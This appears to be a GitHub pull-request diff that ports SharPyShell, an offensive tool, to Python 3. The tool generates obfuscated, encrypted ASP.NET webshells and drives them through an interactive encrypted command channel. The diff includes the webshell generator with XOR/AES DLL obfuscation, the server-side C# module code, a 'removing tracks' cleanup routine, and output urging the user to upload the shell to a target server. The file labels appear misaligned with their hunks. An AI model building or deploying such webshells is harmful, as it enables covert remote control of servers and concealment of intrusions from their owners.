Merge pull request #18 from antonioCoco/py3

Upgrade to version 1.3.0

Author: antonioCoco

.gitignore

@@ -17,12 +17,12 @@ python SharPyShell.py interact -u http://target.url/sharpyshell.aspx -p somepass
 
 ## Requirements
 
-Python version >= 2.7
+Python version >= 3.6
 
 and
 
 ```
-pip install -r requirements.txt
+pip3 install -r requirements.txt
 ```
 
 ## Description

README.md

@@ -1,4 +1,4 @@
-#!/usr/bin/env python2
+#!/usr/bin/env python3
 
 from core.Generate import Generate
 from core.SharPyShellPrompt import SharPyShellPrompt
@@ -144,7 +144,7 @@ def create_interact_parser(subparsers):
 
 
 if __name__ == '__main__':
-    print config.banner
+    print (config.banner)
     parser = argparse.ArgumentParser(prog='SharPyShell', formatter_class=argparse.RawTextHelpFormatter,
                                      epilog=example_text_main)
     parser.add_argument('--version', action='version', version=config.header)
@@ -153,11 +153,14 @@ def create_interact_parser(subparsers):
     create_interact_parser(subparsers)
     args = parser.parse_args()
 
-    if args.mode == 'generate':
-        generate_obj = Generate(args.password, args.encryption, args.obfuscator, args.endian_type, args.output)
-        generate_obj.generate()
+    if args.__contains__('mode'):
+        if args.mode == 'generate':
+            generate_obj = Generate(args.password, args.encryption, args.obfuscator, args.endian_type, args.output)
+            generate_obj.generate()
 
-    if args.mode == 'interact':
-        prompt = SharPyShellPrompt(args.password, args.encryption, args.default_shell, args.url,
-                                   args.user_agent, args.cookies, args.custom_header, args.insecure, args.proxy)
-        prompt.cmdloop('\n')
+        if args.mode == 'interact':
+            prompt = SharPyShellPrompt(args.password, args.encryption, args.default_shell, args.url,
+                                       args.user_agent, args.cookies, args.custom_header, args.insecure, args.proxy)
+            prompt.cmdloop('\n')
+    else:
+        parser.print_help()

SharPyShell.py

@@ -1,5 +1,7 @@
 from utils.Singleton import Singleton
 from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Util.Padding import unpad
 
 
 class ChannelAES(Singleton):
@@ -8,18 +10,16 @@ class ChannelAES(Singleton):
     BS = 16
 
     def __init__(self, password):
-        self.hashed_password = password.decode('hex')
+        self.hashed_password = bytes.fromhex(password)
         self.IV = self.hashed_password[0:self.BS]
 
     def encrypt(self, plain_data):
-        pad = lambda s: s + (self.BS - len(s) % self.BS) * chr(self.BS - len(s) % self.BS)
-        plain_data_pad = pad(plain_data)
+        plain_data_pad = pad(plain_data, self.BS)
         aes = AES.new(self.hashed_password, AES.MODE_CBC, self.IV)
         encrypted_data = aes.encrypt(plain_data_pad)
         return encrypted_data
 
     def decrypt(self, encrypted_data):
         aes = AES.new(self.hashed_password, AES.MODE_CBC, self.IV)
-        unpad = lambda s: s[:-ord(s[len(s) - 1:])]
         decrypted_data = aes.decrypt(encrypted_data)
-        return unpad(decrypted_data)
+        return unpad(decrypted_data, self.BS)

core/ChannelAES.py

@@ -1,17 +1,16 @@
 from utils.Singleton import Singleton
-
+from itertools import cycle
 
 class ChannelXOR(Singleton):
     password = None
 
     def __init__(self, password):
-        self.password = password.encode('utf-8')
+        self.password = password
 
     def encrypt(self, plain_data):
-        key = self.password
-        from itertools import izip, cycle
-        xored = ''.join(chr(ord(x) ^ ord(y)) for (x, y) in izip(plain_data, cycle(key)))
-        return bytearray(xored)
+        key = self.password.encode()
+        xored = b''.join(bytes([(x ^ y)]) for (x, y) in list(zip(plain_data, cycle(key))))
+        return xored
 
     def decrypt(self, encrypted_data):
-        return self.encrypt(encrypted_data)
+        return self.encrypt(encrypted_data)

core/ChannelXOR.py

@@ -7,7 +7,7 @@ class GetTempDirectoryException(ModuleException):
 
     _exception_class = GetTempDirectoryException
 
-    _runtime_code = ur"""
+    _runtime_code = r"""
                 using System;using System.IO;using System.Diagnostics;using System.Text;
                 public class SharPyShell
                 {                    
@@ -45,7 +45,7 @@ class GetEnvDirectoryException(ModuleException):
 
     _exception_class = GetEnvDirectoryException
 
-    _runtime_code = ur"""
+    _runtime_code = r"""
                 using System;using System.IO;using System.Diagnostics;using System.Text;
                 using System.Security.AccessControl;using System.Security.Principal;
                 
@@ -101,7 +101,7 @@ class ClearDirectoriesException(ModuleException):
 
     _exception_class = ClearDirectoriesException
 
-    _runtime_code = ur"""
+    _runtime_code = r"""
                 using System;using System.IO;using System.Diagnostics;using System.Text;
                 public class SharPyShell
                 {                    
@@ -198,7 +198,7 @@ def format_output(text):
         excluded_path = ['env_directory', 'working_directory']
         modules_path = ['@"' + v + '"' for k, v in env_settings.items() if k not in excluded_path]
         modules_path_string_array = '{' + ','.join(modules_path) + '}'
-        print '\nRemoving tracks....\n'
+        print ('\nRemoving tracks....\n')
         result = self.clear_dir_obj.run([modules_path_string_array, env_directory])
         if '{{{ClearDirectoriesException}}}' not in result:
             result = format_output(result)

core/Environment.py

@@ -1,8 +1,10 @@
 from core import config
 from struct import unpack
+from itertools import cycle
 import hashlib
 import random
-
+import io
+import os
 
 class Generate():
 
@@ -11,11 +13,12 @@ class Generate():
     __obfuscator = ''
     __endian_type = ''
 
-    __templates_path = config.sharpyshell_path+'agent/'
-    __runtime_compiler_path = __templates_path + 'runtime_compiler/'
+    __templates_path = config.sharpyshell_path+'agent'+os.sep
+    __runtime_compiler_path = __templates_path + 'runtime_compiler'+os.sep
     __output_path = config.output_path + 'sharpyshell.aspx'
 
     def __init__(self, password, encryption, obfuscator, endian_type, output):
+        password = password.encode('utf-8')
         if encryption == 'aes128':
             self.__password = hashlib.md5(password).hexdigest()
         else:
@@ -41,30 +44,26 @@ def __get_template_code(self):
 
     def __generate_webshell_code_encrypted_dll(self, template_code):
         def xor_file(path, key):
-            with open(path, 'rb') as file_handle:
+            with io.open(path, mode='rb') as file_handle:
                 plain_data = file_handle.read()
-            from itertools import izip, cycle
-            xored = ''.join(chr(ord(x) ^ ord(y)) for (x, y) in izip(plain_data, cycle(key)))
-            return bytearray(xored)
-
-        def generate_byte_file_string(byte_arr):
-            output = [str(hex(byte)) for byte in byte_arr]
-            return '{' + ",".join(output) + '}'
+            xored = []        
+            for (x, y) in list(zip(plain_data, cycle(key))):
+                xored.append(hex(x ^ ord(y)))
+            return '{' + ",".join(xored) + '}'
 
         if 'aes' in self.__encryption:
             dll_name = 'runtime_compiler_aes.dll'
         else:
             dll_name = 'runtime_compiler_xor.dll'
         runtime_compiler_dll_path = self.__runtime_compiler_path + dll_name
         obfuscated_dll = xor_file(runtime_compiler_dll_path, self.__password)
-        obfuscated_dll_string = generate_byte_file_string(obfuscated_dll)
         webshell_code = template_code.replace('{{SharPyShell_Placeholder_pwd}}', self.__password)
-        webshell_code = webshell_code.replace('{{SharPyShell_Placeholder_enc_dll}}', obfuscated_dll_string)
+        webshell_code = webshell_code.replace('{{SharPyShell_Placeholder_enc_dll}}', obfuscated_dll)
         return webshell_code
 
     def __generate_webshell_code_ulong_compression(self, template_code):
         def get_dll_code(dll_code_path):
-            with open(dll_code_path, 'r') as file_handle:
+            with open(dll_code_path, 'rb') as file_handle:
                 dll_code = file_handle.read()
             return dll_code
 
@@ -79,7 +78,7 @@ def get_ulong_arrays(dll_code, divisor, endian_type):
                 representation = '='
             for i in range(0, len(dll_code), 8):
                 int_conversion = unpack(representation + 'Q', dll_code[i:i + 8])[0]
-                ulong_quotients.append(str(int_conversion / divisor))
+                ulong_quotients.append(str(int_conversion // divisor))
                 ulong_remainders.append(str(int_conversion % divisor))
             ulong_quotients_string = '{' + ','.join(ulong_quotients) + '}'
             ulong_remainders_string = '{' + ','.join(ulong_remainders) + '}'
@@ -109,5 +108,5 @@ def generate(self):
         webshell_output_path = self.__output_path
         with open(webshell_output_path, 'w') as file_handle:
             file_handle.write(webshell_code)
-        print 'SharPyShell webshell written correctly to: ' + webshell_output_path
-        print '\nUpload it to the target server and let\'s start having some fun :) \n\n'
+        print ('SharPyShell webshell written correctly to: ' + webshell_output_path)
+        print ('\nUpload it to the target server and let\'s start having some fun :) \n\n')

core/Generate.py

@@ -20,7 +20,7 @@ class Module(Singleton):
         """
     '''runtime_code must have the class name "SharPyShell" and the main function name "ExecRuntime". The ExecRuntime 
        function will be the code run on the server and it must return results in byte[] type '''
-    _runtime_code = ur"""
+    _runtime_code = r"""
                 using System;using System.IO;using System.Diagnostics;using System.Text;
                 public class SharPyShell
                 {                    
@@ -56,17 +56,17 @@ def _create_request(self, args):
     # End Override this method
 
     def _encrypt_request(self, request_clear):
-        request_encrypted = self._channel_enc_obj.encrypt(request_clear)
+        request_encrypted = self._channel_enc_obj.encrypt(request_clear.encode())
         request_encrypted_encoded = base64.b64encode(request_encrypted)
-        return request_encrypted_encoded
+        return request_encrypted_encoded.decode()
 
     def _post_request(self, request_encrypted_encoded):
         response_status_code, response_headers, response_text = \
             self._request_object.send_request(request_encrypted_encoded)
         if response_status_code != 200:
-            raise self._exception_class('{{{' + self._exception_class.__name__ + '}}}\n' +
+            raise self._exception_class('{{{' + str(self._exception_class.__name__) + '}}}\n' +
                                         str(response_headers) + '\n\n' +
-                                        response_text)
+                                        str(response_text))
         return response_text
 
     def _decrypt_response(self, encrypted_response_encoded):
@@ -75,6 +75,7 @@ def _decrypt_response(self, encrypted_response_encoded):
         return response_clear
 
     def _parse_response(self, response):
+        response = response.decode() if isinstance(response, bytes) else response
         if '{{{' + self._exception_class.__name__ + '}}}' in response:
             raise self._exception_class(str(response))
         if '{{{SharPyShellError}}}' in response or '{{{PythonError}}}' in response:

core/Module.py

@@ -1,4 +1,5 @@
 from utils.Singleton import Singleton
+from utils.Singleton import Singleton
 import ssl
 import urllib3
 from urllib3.contrib.socks import SOCKSProxyManager

core/Request.py

@@ -1,11 +1,13 @@
-import config
+from core import config
 from cmd import Cmd
 import os
 import glob
 import sys
+import importlib
 import shlex
 import hashlib
 import signal
+import platform
 from utils import prettify
 from utils.normalize_args import normalize_args
 from utils.random_string import random_generator
@@ -28,9 +30,13 @@ class SharPyShellPrompt(Cmd):
 
     def __init__(self, password, channel_enc_mode, default_shell, url, user_agent,
                  cookies, custom_headers, insecure_ssl, proxy):
-        reload(sys)
-        sys.setdefaultencoding('utf8')
-        signal.signal(signal.SIGTSTP, lambda s, f: self.do_quit())
+        importlib.reload(sys)
+        #sys.setdefaultencoding('utf8')
+        password = password.encode('utf-8')
+        if platform.system() == 'Windows':
+            signal.signal(signal.SIGTERM, lambda s, f: self.do_quit())
+        else:
+            signal.signal(signal.SIGTSTP, lambda s, f: self.do_quit())
         Cmd.__init__(self)
         if channel_enc_mode == 'aes128':
             self.password = hashlib.md5(password).hexdigest()
@@ -80,7 +86,7 @@ def onecmd(self, line):
             return self.emptyline()
         if cmd.startswith('#'):
             response = self.onecmd_custom(cmd.lstrip('#'), args)
-            print response
+            print (response)
             return response
         if cmd in self.helper_commands:
             func = getattr(self, 'do_' + cmd.lstrip('#'))
@@ -113,7 +119,7 @@ def do_cd(self, arg):
         """Change the current working directory."""
         working_directory = self.modules_settings['working_directory']
         if arg == "" or arg == " " or arg == '.':
-            print working_directory
+            print (working_directory)
             return
         if arg == '..':
             arg = working_directory.split('\\')
@@ -127,7 +133,7 @@ def do_cd(self, arg):
             elif len(arg) > 0:
                 arg = '\\'.join(arg)
             else:
-                print "Empty Path."
+                print ("Empty Path.")
                 return
         else:
             if '/' in arg:
@@ -143,25 +149,25 @@ def do_cd(self, arg):
         if '{{{SharPyShellError}}}' not in response:
             self.modules_settings['working_directory'] = arg
         else:
-            print response
+            print (response)
         return response
 
     def do_help(self, arg):
         """List available commands."""
         if arg and arg.lstrip('#') in self.modules_loaded_tree:
-            print self.modules_loaded[arg.lstrip('#')].complete_help
+            print (self.modules_loaded[arg.lstrip('#')].complete_help)
         else:
-            print "\n\n" + self.doc_header + "\n"
+            print ("\n\n" + self.doc_header + "\n")
             data = [['\nCommands\n', '\nDesc\n']]
             for module_name in sorted(self.modules_loaded_tree):
                 data.append(['#%s' % module_name, self.modules_loaded[module_name].short_help])
-            print prettify.tablify(data, table_border=False)
+            print (prettify.tablify(data, table_border=False))
             print
-            print "\n" + "SharPyShell Helper Commands:" + "\n"
+            print ("\n" + "SharPyShell Helper Commands:" + "\n")
             data = [['\nCommands\n', '\nDesc\n']]
             for module_name in sorted(self.helper_commands):
                 data.append(['%s' % module_name, getattr(self, 'do_'+module_name).__doc__])
-            print prettify.tablify(data, table_border=False)
+            print (prettify.tablify(data, table_border=False))
             print
 
     def complete_help(self, text, line, start_index, end_index):
@@ -217,10 +223,10 @@ def default(self, line):
             return
         # Clean trailing newline if existent to prettify output
         result = result[:-1] if (
-                isinstance(result, basestring) and
+                isinstance(result, str) and
                 result.endswith('\n')
         ) else result
-        print result
+        print (result)
 
     def cmdloop(self, intro=None):
         """Repeatedly issue a prompt, accept input, parse an initial prefix
@@ -251,7 +257,7 @@ def cmdloop(self, intro=None):
                     else:
                         if self.use_rawinput:
                             try:
-                                line = raw_input(self.prompt)
+                                line = input(self.prompt)
                             except EOFError:
                                 line = 'EOF'
                         else:
@@ -279,10 +285,10 @@ def cmdloop(self, intro=None):
     def do_quit(self, args=[]):
         """Quit the program."""
         if self.online:
-            print "\n\nQuitting...\n"
-            print self.env_obj.clear_env(self.modules_settings)
+            print ("\n\nQuitting...\n")
+            print (self.env_obj.clear_env(self.modules_settings))
         else:
-            print args[0] + "\n\n\nTarget Offline...\n"
+            print (args[0] + "\n\n\nTarget Offline...\n")
         raise SystemExit
 
     def do_exit(self, args=[]):